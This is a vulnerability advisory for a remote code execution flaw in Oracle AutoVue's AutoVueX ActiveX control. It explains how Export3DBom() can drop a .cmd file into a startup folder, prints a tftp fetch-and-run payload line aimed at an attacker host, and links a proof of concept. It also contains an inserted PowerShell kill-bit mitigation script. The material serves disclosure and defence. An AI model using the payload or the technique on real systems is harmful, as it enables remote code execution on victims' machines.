Oracle AutoVue 20.0.1 AutoVueX ActiveX Control Export3DBom Remote Code
Execution Vulnerability
Tested against: Internet Explorer 8 on Microsoft Windows Server 2003 R2 SP2
Download URL of a test version:
http://www.oracle.com/technetwork/apps-tech/autovue/index.html
File: AutoVueDemo2001.zip
Background:
The mentioned program installs an ActiveX control with the following
settings:
ProgID: AUTOVUEX.AutoVueXCtrl.1
CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
Safe for initialization (registry): true
Safe for scripting (registry): true
Because this control is marked "safe for scripting" and "safe for
initialization", Internet Explorer allows web pages to script it.
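Added example (not part of rgod's advisory): a PowerShell audit of the registration listed above plus the kill-bit mitigation, assuming an elevated prompt on the affected host. The category GUIDs are the standard IE "safe for scripting"/"safe for initialization" component categories and the kill bit lives in the standard ActiveX Compatibility key; on 64-bit Windows the 32-bit IE reads the Wow6432Node copy of that key, which this script does not touch.

```powershell
# Added example, not code from the advisory. Run elevated on the affected host.
$Clsid = '{B6FCC215-D303-11D1-BC6C-0000C078797F}'   # CLSID from the advisory
# Component categories IE consults before scripting / initializing a control
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
# Per-CLSID compatibility flags; 0x400 is the kill bit (IE refuses to load the control)
$CompatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
$KillBit   = 0x400

function Get-AutoVueXStatus {
    $clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $flags = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    [pscustomobject]@{
        Installed        = Test-Path $clsidKey
        BinaryPath       = (Get-ItemProperty -Path "$clsidKey\InprocServer32" `
                            -ErrorAction SilentlyContinue).'(default)'
        SafeForScripting = Test-Path "$clsidKey\Implemented Categories\$SafeForScripting"
        SafeForInit      = Test-Path "$clsidKey\Implemented Categories\$SafeForInit"
        KillBitSet       = ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
    }
}

function Set-AutoVueXKillBit {
    # Create the compatibility key if absent, then OR the kill bit into the existing flags
    if (-not (Test-Path $CompatKey)) { New-Item -Path $CompatKey -Force | Out-Null }
    $current = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                     -Value ($current -bor $KillBit) -Type DWord
}

$status = Get-AutoVueXStatus
$status                                   # show what is registered and whether IE may load it
if ($status.Installed -and -not $status.KillBitSet) {
    Set-AutoVueXKillBit
    Get-AutoVueXStatus | Select-Object KillBitSet   # re-read to confirm the bit is now set
}
```

The kill bit only stops Internet Explorer from instantiating the control; it does not uninstall AutoVueX or change the safe-for-scripting categories the vendor registered.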
Vulnerability:
The mentioned class contains the vulnerable Export3DBom() method, from
the typelib:
...
/* DISPID=108 */
/* VT_BOOL [11] */
function Export3DBom(
/* VT_BSTR [8] */ $sFileName
)
{
}
...
which allows files with arbitrary extensions to be created or overwritten
in arbitrary locations, e.g. automatic startup folders.
By manipulating the argument of this method it is possible to create
a valid application with a .cmd extension.
The resulting file will look like this (see 9sg_autovueii.html):
...
Count, Part Name
1,CALC.EXE
Model Tree (With transformation information):
Entity Name,m[0][0],m[1][0],m[2][0],m[3][0],m[0][1],m[1][1],m[2][1],m[3][1],m[0][2],m[1][2],m[2][2],m[3][2],m[0][3],m[1][3],m[2][3],m[3][3]
CALC.EXE ,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000
...
Also I found a way to execute something useful for an attacker
by invoking the tftp binary (see 9sg_autovueiii.html);
the resulting file will look like this:
...
Count, Part Name
1,tftp 192.168.0.1 GET rgod rgod.bat & rgod.bat
Model Tree (With transformation information):
Entity Name,m[0][0],m[1][0],m[2][0],m[3][0],m[0][1],m[1][1],m[2][1],m[3][1],m[0][2],m[1][2],m[2][2],m[3][2],m[0][3],m[1][3],m[2][3],m[3][3]
tftp 192.168.0.1 GET rgod rgod.bat & rgod.bat ,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000
...
which will retrieve another script at the next reboot.
PoC:
http://retrogod.altervista.org/9sg_autovueii.zip
Modify the SRC parameter to point to the .SLDPRT files.
//rgod